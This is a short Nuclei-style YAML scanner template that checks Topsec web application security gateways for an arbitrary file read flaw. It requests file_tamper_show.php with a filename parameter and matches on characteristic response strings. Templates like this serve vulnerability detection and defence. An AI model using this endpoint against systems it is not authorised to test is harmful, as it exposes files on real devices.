id: topsec-include

info:
  name: 天融信WEB应用安全网关任意文件读取漏洞
  author: Str1am
  severity: high
  tags: topsec,include

requests:
  - method: GET
    path:
      - "{{BaseURL}}/function/content/tamper/file_tamper_show.php?filename=file_tamper_show.php"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "数据文件未找到！请检查相关设置"
          - "file_get_contents"
        part: body
        condition: and